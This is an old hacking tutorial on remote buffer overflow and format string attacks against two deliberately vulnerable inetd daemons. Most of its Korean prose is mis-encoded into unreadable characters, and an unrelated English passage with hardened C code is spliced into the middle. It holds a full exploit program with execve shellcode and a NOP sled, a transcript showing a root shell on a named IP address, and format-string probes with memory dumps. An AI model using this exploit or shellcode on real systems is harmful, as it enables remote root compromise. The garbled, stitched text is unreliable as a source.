|================================================================|
 Title: Remote Buffer Overflow & Format String :-)
 Author : (Xpl017Elz)
 E-mail : szoahc@hotmail.com
 Home: http://x82.i21c.net
 Date: f. 2001/10/11 s. 2001/10/23 t. 2001/11/09
|================================================================|

0x00.
0x01.
 - 0x0100000a. Ŭ̾Ʈ (Client & Server)
 - 0x0100000b. Ʈ (port)
 - 0x0100000c. Ŷ (packet)
 - 0x0100000d. (Daemon)
0x02.
 - 0x0200000a. Remote
 - 0x0200000b. Server
 - 0x0200000c. ݿ ̿ Daemon
 - 0x0200000d. ߰
0x03. Remote Buffer Overflow
 - 0x0300000a. finding
 - 0x0300000b. exploit
 - 0x0300000c. stack debugging
0x04. Remote Format String
 - 0x0400000a. finding
 - 0x0400000b. exploit
 - 0x0400000c. stack debugging
0x05.
|================================================================|

0x00.

̹, Internet û source exploit scripts kids ߱ ִ. , ƴҰ̶ Ѵ. ε ݿ Ͻð ô е鲲 remote attack ظ µ Ǿ Ѵ. ϰų ִºκ ڿ mail ֱ ... ׷, Ŀ ˾ƺ .

0x01.

Network ̳ ˰̴. , õҶ Network ൿ ؾ ϴºκ ִ. ݻӸ ƴ϶ OS programming Ҷ ׾Ƶθ ȴ ;-) 켱, Network ϰڴ. Network, żο ConnectionǾ ִ Series node, connection point ǹѴ. Network ٸ Network Connection ְ, Sub Network ִ. Network Ÿ LAN (local area network), MAN (metropolitan area network), WAN (wide area network) .

0x0100000a. Ŭ̾Ʈ (Client & Server)

Client & Server ǻ Program ̿ ̷ 踦 Ÿ ̴. Client ٸ Program 񽺸 ûϴ Program̸, û ִ Program̴. Client & Server ǻ , Network ȯ濡 ū ǹ̸ . Network 󿡼 Client & Server model ٸ лǾ ִ Program Connection ִ Ѵ. Ϲ Client & Server model, (daemon)̶ Ҹ Program Ȱȭ ¿ Client 䱸 ٸµ, ü ټ Client Program ϳ Server Program Ѵ. ̿Ͱ Network ؼ ʿ ΰ ٷ, port̴.

0x0100000b. Ʈ (port)

port Ҷ ϸ, Internet Protocol TCP/IP Client Program Network Ư Server Program ϴ ȴ. Protocol HTTP , TCP/IP Protocol ϴ Program ̸ portȣ ִ. ̷ ͵ IANA Ǿ, ˷ port̶ Ҹ. portȣ 0 65536 ̴. portȣ 0 1024  Ư Service ɼ ֵ Ǿ ִ.

0x0100000c. Ŷ (packet)

Packet̶ data ȣ ȣ Ե 2, Ʈ ׷ ϴµ, Ư Packetȯ Ŀ ͸ Packet̶ ⺻ ͸ Ͽ , ٽ data Ͽ óѴ. ̷ν, 츮 ˾ƾ ⺻ Ͱ. ٵ ̷ ǹ ɰ̴. ? Ʈũ Ͽ°? ̴. ̴, 츮 ˾ƾ remote ݿ ϱ ̴. ˰ִ localݰ ٸ ̹ ˰ϴ. , Daemon 丸 κ  ϰڴ.

0x0100000d.
(Daemon) Daemon ֱ Service û óϱ Linux Unix(, Server) Ǵ Program Ѵ. , 䱸 Ǵٸ Program̳ Process ó ֵ Ѵ. 0x02. κп ٷ鳻 ݵ صα ٶ. ɽġ ݺκ ַ ұ Ѵ. remote غִ. 0x0200000a. Remote fi) Server Ư Daemon ϰִ Buffer Overflow . se) Ư Daemon ϰ ִ Format String . th) Ÿ, ҷ Daemon Program. غִ Overflow Daemon Format String Daemon غ. ⼭ Overflow Format String ϰ ʹٸ, Ʒ ϱ ٶ. http://www.zdnet.com/eweek/stories/general/0,11011,2605669,00.html http://www.networkmagazine.com/article/NMG20000511S0015 http://julianor.tripod.com/usfs.html http://my.dreamwiz.com/hackingm/lecture/Overflow.txt http://my.dreamwiz.com/hackingm/lecture/f0rm47_s7r1n9.txt remote Ϸ, Server 2밡 ʿϴ. Ѵ뿡 localhost loopback ̿ص , ٸ memory stack ý ϴ. 0x0200000b. Server 켱, ݴ host ̴. [x82@xpl017elz x82]$ uname -a Linux xpl017elz.org 2.2.14-5.0 #1 Thu Mar 16 02:23:03 KST 2000 i586 unknown [x82@xpl017elz x82]$ gcc -v Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/egcs-2.91.66/specs gcc version egcs-2.91.66 19990314/Linux (egcs-1.1.2 release) [x82@xpl017elz x82]$ gdb -v GNU gdb 19991004 Copyright 1998 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "i386-redhat-linux". [x82@xpl017elz x82]$ Ʒ, ݽõ host ̴. [x82@testsub x82]$ uname -a Linux testsub 2.2.12-20kr #1 Tue Oct 12 16:46:36 KST 1999 i686 unknown [x82@testsub x82]$ gcc -v Reading specs from /usr/lib/gcc-lib/i386-redhat-linux/egcs-2.91.66/specs gcc version egcs-2.91.66 19990314/Linux (egcs-1.1.2 release) [x82@testsub x82]$ gdb -v GNU gdb 4.18 Copyright 1998 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. 
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux".
[x82@testsub x82]$

0x0200000c. ݿ ̿ Daemon

Daemon Ѵ. е Ͽ, inetd ̿Ͽ ֵ Ͽ.

[root@xpl017elz tmp]$ cat /etc/inetd.conf
tfido stream tcp nowait root /var/tmp/daemon daemon
[root@xpl017elz tmp]$

60177(tfido service) /var/tmp/daemon ̶ ϰ ξ. tcp port· root ̸ Ѵ.

, Overflow Daemon α׷ Source ̴.

    #include <stdio.h>

    int main(void)
    {
        char exec[600];
        fgets(exec, 700, stdin);   /* size argument is 100 bytes larger than the buffer */
        return 0;
    }

Source 캸, fgets() Լ 100 ڿ Ƿν 迭 ÷ο찡 ߻ϴ° ˼ִ.
(fgets(...,700,...); <-- ̺κп ÷ο츦 ߱)

, Format String Daemon α׷ Source ̴.

    #include <stdio.h>

    int main(void)
    {
        char bug[500];
        fgets(bug, 500, stdin);
        printf(bug);   /* client input is used directly as the format string */
        return 0;
    }

Source printf() Լ ϴ Format string ´.
(printf(bug); <-- ̺κп ȯڸ ʰ Է¹޴ ü Ѵ)

local ݻ󿡼 stack address shellcode address code Ͽ ̵ ־. remote ݵ ̿ shell ° иϴ. , local ݵ߿ ϳ eggshell α׷ Ҽ¾. ſ (밡?) μ, remote ̷ ִ°̴. ޴ daemon Ư¡ ڷ Է ޴´ٴ̴. ٷ ̺κп ڰ ̿Ҽ ִ service  츮 ϴ ޼ ɼ Եȴ. , Է ƴϴ Ͼ ִ. local glibc 쿡 Է ƴ locale ̿ Է shell . ( ߰ ƴҼ) , 츮 ʰ Daemon ̿ϴ°̹Ƿ... :-) (̻ ʿ ) ~ ׷, Է ٸ daemon ̿ 츮 ϴ ޼غ .

0x0200000d. ߰

remote ݽÿ ȯ濡 Ѵ. remote 󿡼 host stack debuggingϴ ۾ Ҽ , 밡 õ KnowHow ̿ؾ Ѵ. ׷Ƿ, ̷ ̴. Ͽ, 츮 ȯ ſ simpleϰ, ȯ̳ ϴ ¿ Ұ̴. exploit c programming ̿Ұ̸, stack 뺯 Ȯ debugging ƴ ܺο µǵ code dumpϿ 캸 Ұ̴.

0x03. Remote Buffer Overflow

켱, Remote Buffer Overflow غô. Ʒ ܺ Server Target Server telnet غ̴.

[x82@testsub x82]$ id
uid=501(x82) gid=501(x82) groups=501(x82)
[x82@testsub x82]$ telnet xxx.xx.xx.xx 60177
Trying xxx.xx.xx.xx...
Connected to xxx.xx.xx.xx.
Escape character is '^]'.

0x0300000a. finding

Overflow Ͼ ܺο ɼ ʴ. , Ȯ ° ˾Ƴ ϴ ϰ̴. κ Remote testing ڽ Server localhost loopback õѴ. ο Server ܺθ ϴ°̱ Ϲ Remote ݰ ٸ Debugging Ҽ ִ°̴. α׷߿ ϳ ltrace̴. α׷ ̿ ǰ ִ daemon μ ġϿ 캸, Overflow Ͼ , ġ address  Ǵ ľҼ ְԵȴ. ̷ν exploit, ִ ٸ ý ǿ ϸ, ݼ ſ.
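The two toy daemons above each differ from a safe program by a single argument: fgets() is handed 700 for a 600-byte array, and printf() is handed the client's bytes as its format. The following is an added example, not code from the article or its author, showing the hardened form of both: the size passed to fgets() is the real buffer size, a line that does not fit is detected and refused rather than silently cut to a prefix, and client data only ever reaches the output through a "%s" argument. The helper names (bounded_read_line, echo_untrusted, simulate_line, was_truncated, bytes_stored) are my own, and simulate_line uses a tmpfile() as a stand-in for the socket so the check runs offline on a constructed line.

```c
/* Added example (not code from the original article): the two toy daemons
 * rewritten so that the buffer size and the format string are chosen by the
 * program, not by the client.  Helper names are my own. */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Read one line into dst without ever writing more than cap bytes (NUL
 * included).  The trailing newline is stripped.  If the line did not fit, the
 * rest of it is consumed and *truncated is set, so the caller can reject the
 * request instead of silently processing a prefix.  Returns bytes stored. */
size_t bounded_read_line(char *dst, size_t cap, FILE *in, int *truncated)
{
    *truncated = 0;
    if (cap == 0)
        return 0;
    if (fgets(dst, (int)cap, in) == NULL) {  /* cap is the real buffer size */
        dst[0] = '\0';
        return 0;
    }
    size_t n = strlen(dst);
    if (n > 0 && dst[n - 1] == '\n') {
        dst[--n] = '\0';
        return n;
    }
    /* No newline stored: drain the remainder.  Any byte before the newline
     * (or EOF) proves the line was longer than the buffer. */
    int c;
    while ((c = fgetc(in)) != EOF && c != '\n')
        *truncated = 1;
    return n;
}

/* Echo client data as an argument, never as the format string. */
void echo_untrusted(const char *s, FILE *out)
{
    fprintf(out, "%s\n", s);     /* or fputs(s, out); */
}

/* Offline stand-in for the socket: a constructed line of `len` copies of
 * `fill` plus '\n' is written to a tmpfile() and read back through
 * bounded_read_line with a cap-byte buffer.  Returns the truncated flag and
 * stores the byte count in *stored (-1 if the setup itself failed). */
int simulate_line(size_t len, char fill, size_t cap, size_t *stored)
{
    char *line = malloc(len + 1);
    char *buf = malloc(cap);
    FILE *in = tmpfile();
    int truncated = 0;
    *stored = 0;
    if (line == NULL || buf == NULL || in == NULL) {
        free(line);
        free(buf);
        if (in != NULL)
            fclose(in);
        return -1;
    }
    memset(line, fill, len);
    line[len] = '\n';
    fwrite(line, 1, len + 1, in);
    rewind(in);
    *stored = bounded_read_line(buf, cap, in, &truncated);
    fclose(in);
    free(buf);
    free(line);
    return truncated;
}

/* Single-value views of simulate_line, so a check reads as one call. */
int was_truncated(size_t len, char fill, size_t cap)
{
    size_t n;
    return simulate_line(len, fill, cap, &n);
}

size_t bytes_stored(size_t len, char fill, size_t cap)
{
    size_t n;
    simulate_line(len, fill, cap, &n);
    return n;
}

int main(void)
{
    /* Same shape as the article's daemon: a 600-byte buffer.  A 700-byte
     * request is now refused instead of overwriting the saved ebp and the
     * return address. */
    char exec[600];
    int truncated;
    size_t n = bounded_read_line(exec, sizeof exec, stdin, &truncated);
    if (truncated) {
        fputs("request too long, rejected\n", stderr);
        return 1;
    }
    printf("%zu bytes: ", n);
    echo_untrusted(exec, stdout);
    return 0;
}
```

With a 600-byte buffer, a 700-byte line is stored as 599 bytes and flagged; a 599-byte line fills the buffer exactly and is not flagged, which is why the drain loop only sets the flag when a byte other than the newline is still pending.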
(, ) ̿ : [root@xpl017elz /tmp]# ltrace -p 788 -o /tmp/ltracing & # 788 = Daemon process [1] 792 [root@xpl017elz /tmp]# (printf "\~\~\~ format string \~\~\~";cat) | nc 127.0.0.1 port [1]+ Done ltrace -p 788 -o /tmp/ltracing [root@xpl017elz /tmp]# cat /tmp/ltracing 788 svc_getreqset(0xbffffcac, 256, 0xbffffd94, 0, 0x400f2398 788 xdr_string(0x08051008, 0xbffff6ec, 1024, 0x400d6d63, 0x08051008) = 1 788 gethostbyname(0x08052220, 0xbffff6ec, 0x080498b8, 0xbffff6ec, 0xbffffc34)=0 788 vsnprintf(0xbffff2b8, 1024, 0x0804d309, 0xbffff6c4, 0xbffff6ec) = 1023 788 syslog(5, 0xbffff2b8, 0xbffff6ec, 0x0804a658, 0x90909090 788 --- SIGSEGV (Segmentation fault) --- ( ᰡ Ͼ.) 788 +++ killed by SIGSEGV +++ ̷ؼ ˾Ƴ Ͽ ϴ Remote attack Ѷ, ߴ Rpc statd ̿. string() Լ Ͼ Overflow , ó Ͽ, , õغ ִ. ٸ Source Ͽ ˾ƺ ڿ 512 ڿ Է 4byteĿ Segmentation fault Ͼ°ͱ ˾ƺ ־. [root@xpl017elz tmp]# [2]- Done ltrace -p 5213 -o /tmp/debug [root@xpl017elz tmp]# cat /tmp/debug 5213 strcpy(0xbffff900, "xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx"...) = 0xbffff900 5213 --- SIGSEGV (׸̼ ) --- 5213 +++ killed by SIGSEGV +++ [root@xpl017elz tmp]# dumpcode ̿Ͽ, address оͺ. [x82@testsub x82]$ telnet xxx.xx.xx.xx 60177 Trying xxx.xx.xx.xx... Connected to xxx.xx.xx.xx. Escape character is '^]'. 0xbffffb00 0d 0a 00 40 a0 fd ff bf 68 fb ff bf 00 00 00 00 ...@....h....... 0xbffffb10 00 00 00 00 00 00 00 00 00 00 00 00 90 20 01 40 ............. .@ 0xbffffb20 07 00 00 00 f0 93 00 40 18 00 00 00 58 fb ff bf .......@....X... 0xbffffb30 54 fb ff bf 50 fb ff bf 30 02 00 40 00 00 00 00 T...P...0..@.... 0xbffffb40 00 00 00 00 94 fd ff bf 02 00 00 00 00 00 00 00 ................ 0xbffffb50 14 13 00 40 c8 02 00 00 00 00 00 00 00 00 00 00 ...@............ 0xbffffb60 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 ...........@.... 0xbffffb70 8c 21 01 40 00 00 00 00 00 00 00 00 00 00 00 00 .!.@............ ... ߷ ... 0xbffffda0 01 00 00 00 84 fe ff bf 00 00 00 00 8b fe ff bf ................ 
0xbffffdb0 a6 fe ff bf b1 fe ff bf bc fe ff bf ca fe ff bf ................ 0xbffffdc0 fc fe ff bf 11 ff ff bf 18 ff ff bf 24 ff ff bf ............$... 0xbffffdd0 2f ff ff bf 3f ff ff bf 4a ff ff bf 5b ff ff bf /...?...J...[... 0xbffffde0 68 ff ff bf 70 ff ff bf 7c ff ff bf 00 00 00 00 h...p...|....... 0xbffffdf0 03 00 00 00 34 80 04 08 04 00 00 00 20 00 00 00 ....4....... ... 0xbffffe00 05 00 00 00 06 00 00 00 06 00 00 00 00 10 00 00 ................ 0xbffffe10 07 00 00 00 00 00 00 40 08 00 00 00 00 00 00 00 .......@........ Connection closed by foreign host. ? Remote ̷ ø :-( ϴ daemon Source(daemon.c) 캸, exec 600byte Է ebp 4byte ٷ Return address Ѵ. ׷Ƿ, 600byte shellcode Է Է shellcode ּҸ Return address Ǵ°̴. ̰ ȭϿ Ÿ, . +------------+ +-----------+ +-------------+ | exec | | e b p | | Return add | +------------+ +-----------+ +-------------+ |__________| |_________| |_________| | | | 600byte 4byte 4byte 0x0300000b. exploit ų Stack : [NNNNNN...NNNNNNNSSSS...SSSSXXXX...XXXXXX&shellcode] NOP = 250byte (0xbffffb00 ~ 0xbffffbf9) shellcode = 24byte (0xbffffbfa ~ 0xbffffc11) etcvalues = 330byte (0xbffffc12 ~ 0xbffffd5b) shellcode address = 4byte (0xbffffd5c ~ 0xbffffd5f) : 608byte Overwrite (0xbffffb00 ~ 0xbffffd5f) Ͱ code dumping address ˾Ƴ ־. ϼ exploit: [x82@testsub x82]$ cat expl.c #include char exec [1000], *netcat = "/usr/local/bin/nc"; /* 츮 Ŷ α׷. κ nc ġ ٲ־ Ѵ. */ char shellcode[] = "\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52" "\x53\x89\xe1\x8d\x42\x0b\xcd\x80"; /* shellcode ( 24byte ҿ) */ /* __asm__(" xorl %edx,%edx pushl %edx pushl $0x68732f6e pushl $0x69622f2f movl %esp,%ebx pushl %edx pushl %ebx movl %esp,%ecx leal 0xb(%edx),%eax int $0x80 "); */ main( int argc, char *argv[] ) { /* Է¹ IP(argv[1]) port(argv[2]) */ int score, score_ran, number; char allcode[1500]; /* code ۼ */ bzero ( &allcode, 1500 ); for ( score = 0; score <= (274-sizeof(shellcode)); score++ ) { allcode[score] = 0x90; /* 275byte shellcode ̸ NOP Ѵ. 
*/ } for ( score_ran = 0, score = score; score_ran < (sizeof(shellcode)-1); score++, score_ran++ ) { allcode[score] = shellcode[score_ran]; /* Էµ 1byte ̳ʽ shellcode shellcode ִ´. */ } for ( number = 0; number <= 329; number++ ) { allcode[score++] = 0x20; /* Space Key */ /* 330byte 0x20 (̽) Ѵ. */ } /* 4byte ٷ Return Address ִ´. */ allcode[score++] = 0xf8; allcode[score++] = 0xfb; allcode[score++] = 0xff; allcode[score++] = 0xbf; /* 츮 shellcode ￵ 0xbffffbf8 ̶ ˾Ƿ, κ address Ͽ ־. */ printf("\n\n\t[Test] Remote Buffer Overflow Attack Exploit"); printf("\n\tMake by '\\x82\\x41\\xff\\xbf'\n\n"); if ( argc < 3 ) { /* μ ԷȮ */ printf("\tUsage: %s target[IP] target[PORT]\n",argv[0]); printf("\t Ex>: %s 127.0.0.1 60177\n\n",argv[0]); exit(0); } sprintf(exec,"( printf \"%s\"; cat ) | %s %s %s ",allcode,netcat,argv[1],argv[2] ); system(exec); /* User Է¹ ip,port Ѵ. , ۼ Ŷ netcat̶ α׷ ̿Ͽ Է¹ ȣƮ port Ѵ. */ } [x82@testsub x82]$ 0x0300000c. stack debugging ʴ´. ϰ nc ̿ Packet ִ°̴. exploit ̿ϸ, shell ִ. [x82@testsub x82]$ ./expl 211.59.28.75 60177 [Test] Remote Buffer Overflow Attack Exploit Make by '\x82\x41\xff\xbf' id uid=0(root) gid=0(root) groups=0(root) whoami root exit [x82@testsub x82]$ Debugging: 0xbffffb00 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 0xbffffb10 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 0xbffffb20 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 0xbffffb30 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 0xbffffb40 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 0xbffffb50 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 0xbffffb60 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 0xbffffb70 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 0xbffffb80 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 0xbffffb90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 
0xbffffba0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 0xbffffbb0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 0xbffffbc0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 0xbffffbd0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 0xbffffbe0 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 ................ 0xbffffbf0 90 90 90 90 90 90 90 90 90 90 // NOP κ 31 d2 52 68 6e 2f ..........1.Rhn/ 0xbffffc00 73 68 68 2f 2f 62 69 89 e3 52 53 89 e1 8d 42 0b shh//bi..RS...B. 0xbffffc10 cd 80 // shellcode κ .. 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0xbffffc20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0xbffffc30 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0xbffffc40 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0xbffffc50 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0xbffffc60 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0xbffffc70 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0xbffffc80 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0xbffffc90 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0xbffffca0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0xbffffcb0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0xbffffcc0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0xbffffcd0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0xbffffce0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0xbffffcf0 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0xbffffd00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0xbffffd10 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0xbffffd20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0xbffffd30 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0xbffffd40 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0xbffffd50 20 20 20 20 20 20 20 20 20 20 20 20 // etcvalues κ f8 fb ff bf .... 0xbffffd60 0a 00 00 00 // &shellcode address id uid=0(root) gid=0(root) groups=0(root) exit ̷ν, Remote Buffer Overflow Ͽ. ׷, ̹ Remote Format String õغ. 0x04. 
Remote Format String Remote Buffer Overflow ݰ ȯ Ǿ. Ʒ ܺ Server Target Server telnet غ̴. [x82@testsub x82]$ id uid=501(x82) gid=501(x82) groups=501(x82) [x82@testsub x82]$ telnet xxx.xx.xx.xx 60177 Trying xxx.xx.xx.xx... Connected to xxx.xx.xx.xx. Escape character is '^]'. 0x0400000a. finding ߰ κп ߴͰ code dump ޾ƺ ִȯ Ͽ õϿ. gdb ǰ ִ μ ġص , ۾ ̷ڴ. 켱, 츮 ϴ target server  ˾ƺ. [x82@testsub x82]$ (printf "id";cat) | nc xxx.xx.xx.xx 60177 id 0xbffff7d4 69 64 0a 00 00 00 00 40 00 00 00 00 8c 21 01 40 id.....@.....!.@ 0xbffff7e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0xbffff7f4 00 00 00 00 c4 21 01 40 bc 21 01 40 94 21 01 40 .....!.@.!.@.!.@ 0xbffff804 9c 21 01 40 a4 21 01 40 00 00 00 00 00 00 00 00 .!.@.!.@........ 0xbffff814 00 00 00 00 ac 21 01 40 b4 21 01 40 00 00 00 00 .....!.@.!.@.... 0xbffff824 00 00 00 00 8c 21 01 40 d8 a4 02 40 00 f9 ff bf .....!.@...@.... 0xbffff834 86 79 00 40 ac a4 02 40 ac a4 02 40 24 20 01 40 .y.@...@...@$ .@ 0xbffff844 a8 2b 01 40 0d 43 00 00 24 20 01 40 a8 2b 01 40 .+.@.C..$ .@.+.@ 0xbffff854 a6 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0xbffff864 00 00 00 00 00 00 00 00 b0 3a 00 00 00 00 00 00 .........:...... 0xbffff874 00 00 00 00 00 00 00 00 00 00 00 00 24 f7 01 40 ............$..@ 0xbffff884 ab 03 00 00 64 2a 02 40 74 bc 01 40 a8 2b 01 40 ....d*.@t..@.+.@ 0xbffff894 d8 a4 02 40 68 f9 ff bf 86 79 00 40 ac a4 02 40 ...@h....y.@...@ 0xbffff8a4 88 82 04 08 24 20 01 40 b0 26 01 40 6e 00 00 00 ....$ .@.&.@n... 0xbffff8b4 ac a4 02 40 24 20 01 40 a8 2b 01 40 5b 41 00 00 ...@$ .@.+.@[A.. 0xbffff8c4 a8 2b 01 40 a5 59 00 00 86 79 00 40 ac a4 02 40 .+.@.Y...y.@...@ 0xbffff8d4 98 2a 02 40 24 20 01 40 b0 26 01 40 14 82 04 08 .*.@$ .@.&.@.... 0xbffff8e4 f0 38 00 00 f4 26 02 40 a8 06 00 00 64 2a 02 40 .8...&.@....d*.@ 0xbffff8f4 74 bc 01 40 a8 2b 01 40 03 00 00 00 18 2e 01 40 t..@.+.@.......@ 0xbffff904 01 00 00 00 20 f9 ff bf f4 81 04 08 b4 28 01 40 .... 
........(.@ 0xbffff914 0f 53 8e 07 9c f9 ff bf 72 82 04 08 f4 26 02 40 .S......r....&.@ 0xbffff924 a8 2b 01 40 ac f9 ff bf bf 6b 02 40 64 f5 01 40 .+.@.....k.@d..@ 0xbffff934 a8 2b 01 40 f4 0c 02 40 a8 2b 01 40 b4 28 01 40 .+.@...@.+.@.(.@ 0xbffff944 8e ff 77 01 cc f9 ff bf 60 82 04 08 f4 1f 02 40 ..w.....`......@ 0xbffff954 a8 2b 01 40 77 ff ff bf c0 f9 ff bf 1f 00 00 00 .+.@w........... 0xbffff964 ec 7b 10 40 a0 f9 ff bf 9d 9f 00 40 c7 03 01 40 .{.@.......@...@ 0xbffff974 48 2e 01 40 07 00 00 00 ee 9e 00 40 1c 97 04 08 H..@.......@.... 0xbffff984 00 a6 00 40 14 fa ff bf b0 26 01 40 f4 81 04 08 ...@.....&.@.... 0xbffff994 28 97 04 08 72 82 04 08 f4 26 02 40 c8 f9 ff bf (...r....&.@.... 0xbffff9a4 10 a1 00 40 4b 80 0f 40 1c 97 04 08 00 a6 00 40 ...@K..@.......@ 0xbffff9b4 14 fa ff bf c8 f9 ff bf 4b 84 04 08 08 97 04 08 ........K....... 0xbffff9c4 1c 97 04 08 e8 f9 ff bf fb 11 03 40 01 00 00 00 ...........@.... 0xbffff9d4 14 fa ff bf 1c fa ff bf ........ [x82@testsub x82]$ ٽ , Ϲ ̷ ݿ α׷ . --; target server Stack "id\n" (69 64 0a) push Ǿ. format string Overflow ϰ, 鿡 ٹ ٸ. daemon fgets() Լ ˻縦 ϴ Լ̹Ƿ Overflow ʴ´. , ϴ κ printf() Լ 츮 ϴ° ̷ ش. ݽ Ǵ code format string (ȯ) ̿Ͽ Stack pushѴ. ѹ, testing 캸 ٶ. [x82@testsub x82]$ (printf "AAAA %%x %%x %%x %%x";cat) | nc xxx.xx.xx.xx 60177 AAAA 41414141 20782520 25207825 78252078 0xbffff7d4 41 41 41 41 25 78 25 78 25 78 25 78 0a 00 01 40 AAAA%x%x%x%x...@ 0xbffff7e4 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0xbffff7f4 00 00 00 00 c4 21 01 40 bc 21 01 40 94 21 01 40 .....!.@.!.@.!.@ 0xbffff804 9c 21 01 40 a4 21 01 40 00 00 00 00 00 00 00 00 .!.@.!.@........ 0xbffff814 00 00 00 00 ac 21 01 40 b4 21 01 40 00 00 00 00 .....!.@.!.@.... 0xbffff824 00 00 00 00 8c 21 01 40 d8 a4 02 40 00 f9 ff bf .....!.@...@.... 
0xbffff834 86 79 00 40 ac a4 02 40 ac a4 02 40 24 20 01 40 .y.@...@...@$ .@ 0xbffff844 a8 2b 01 40 0d 43 00 00 24 20 01 40 a8 2b 01 40 .+.@.C..$ .@.+.@ 0xbffff854 a6 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................ 0xbffff864 00 00 00 00 00 00 00 00 b0 3a 00 00 00 00 00 00 .........:...... 0xbffff874 00 00 00 00 00 00 00 00 00 00 00 00 24 f7 01 40 ............$..@ 0xbffff884 ab 03 00 00 64 2a 02 40 74 bc 01 40 a8 2b 01 40 ....d*.@t..@.+.@ 0xbffff894 d8 a4 02 40 68 f9 ff bf 86 79 00 40 ac a4 02 40 ...@h....y.@...@ 0xbffff8a4 88 82 04 08 24 20 01 40 b0 26 01 40 6e 00 00 00 ....$ .@.&.@n... 0xbffff8b4 ac a4 02 40 24 20 01 40 a8 2b 01 40 5b 41 00 00 ...@$ .@.+.@[A.. 0xbffff8c4 a8 2b 01 40 a5 59 00 00 86 79 00 40 ac a4 02 40 .+.@.Y...y.@...@ 0xbffff8d4 98 2a 02 40 24 20 01 40 b0 26 01 40 14 82 04 08 .*.@$ .@.&.@.... 0xbffff8e4 f0 38 00 00 f4 26 02 40 a8 06 00 00 64 2a 02 40 .8...&.@....d*.@ 0xbffff8f4 74 bc 01 40 a8 2b 01 40 03 00 00 00 18 2e 01 40 t..@.+.@.......@ 0xbffff904 01 00 00 00 20 f9 ff bf f4 81 04 08 b4 28 01 40 .... ........(.@ 0xbffff914 0f 53 8e 07 9c f9 ff bf 72 82 04 08 f4 26 02 40 .S......r....&.@ 0xbffff924 a8 2b 01 40 ac f9 ff bf bf 6b 02 40 64 f5 01 40 .+.@.....k.@d..@ 0xbffff934 a8 2b 01 40 f4 0c 02 40 a8 2b 01 40 b4 28 01 40 .+.@...@.+.@.(.@ 0xbffff944 8e ff 77 01 cc f9 ff bf 60 82 04 08 f4 1f 02 40 ..w.....`......@ 0xbffff954 a8 2b 01 40 77 ff ff bf c0 f9 ff bf 1f 00 00 00 .+.@w........... 0xbffff964 ec 7b 10 40 a0 f9 ff bf 9d 9f 00 40 c7 03 01 40 .{.@.......@...@ 0xbffff974 48 2e 01 40 07 00 00 00 ee 9e 00 40 1c 97 04 08 H..@.......@.... 0xbffff984 00 a6 00 40 14 fa ff bf b0 26 01 40 f4 81 04 08 ...@.....&.@.... 0xbffff994 28 97 04 08 72 82 04 08 f4 26 02 40 c8 f9 ff bf (...r....&.@.... 0xbffff9a4 10 a1 00 40 4b 80 0f 40 1c 97 04 08 00 a6 00 40 ...@K..@.......@ 0xbffff9b4 14 fa ff bf c8 f9 ff bf 4b 84 04 08 08 97 04 08 ........K....... 0xbffff9c4 1c 97 04 08 e8 f9 ff bf fb 11 03 40 01 00 00 00 ...........@.... 
